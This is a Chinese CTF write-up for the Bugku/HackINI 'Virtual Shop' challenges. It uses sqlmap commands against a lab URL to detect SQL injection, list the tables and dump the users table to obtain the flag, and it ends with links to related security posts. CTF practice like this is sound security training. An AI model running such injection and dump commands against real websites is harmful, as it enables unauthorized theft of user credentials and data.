Bugku 2023 HackINI Virtual Shop 和 2023 HackINI Virtual Shop 2

目录

前置知识

解题过程

[Virtual Shop](#Virtual Shop)

[Virtual Shop 2](#Virtual Shop 2)

总结


前置知识

网络安全-SQL注入-CSDN博客

解题过程

Virtual Shop

打开靶场

可以看到URL有参数传输,再根据题目描述了数据库相关内容,可以确定为SQL注入

练习一下SQLMAP工具

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport

可以看到存在多种注入方式,并且数据库类型为SQLite,该数据库是轻量级数据库,没有数据库名。直接查询有哪些表

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport --tables

结合题目描述,flag应该是再users中admin的密码那里,直接dump表users的全部数据即可

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport -T users --dump

成功获取flag

复制代码
shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

Virtual Shop 2

步骤与Virtual Shop相同,sqlmap注入前清除下缓存,要不然扫的是Virtual Shop的结果

复制代码
python sqlmap.py --purge

总结

一道基础的sql注入的题,可以手工注入练习,也可以直接sqlmap梭哈

相关推荐
技术不好的崎鸣同学10 小时前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
Quincy_Freak11 小时前
信创内网数据规范实践:银河麒麟下SQLite本地数据安全管理方案
数据库·sqlite·arm·数据库管理·大数据分析·银河麒麟·aarch64
云水一下16 小时前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
介一安全1 天前
【SRC】基础思路篇10:越权与未授权访问完全指南
web安全·安全性测试·src·越权
Chockmans1 天前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
超级数据查看器1 天前
超级数据查看器 v10.0 发布
java·大数据·数据库·sqlite·安卓
四月天432 天前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
TrisighT2 天前
Electron 鸿蒙 PC 上做本地搜索,Fuse.js 比 SQLite 快 6 倍——但我愣是选了最慢的方案
electron·sqlite·harmonyos
大气的小蜜蜂2 天前
基于Python+PyQt5+SQLite的药房管理系统实现:事务一致性与界面解耦全流程解析
python·qt·sqlite
技术不好的崎鸣同学2 天前
[MRCTF2020]PYWebsite 思路及解法
安全·web安全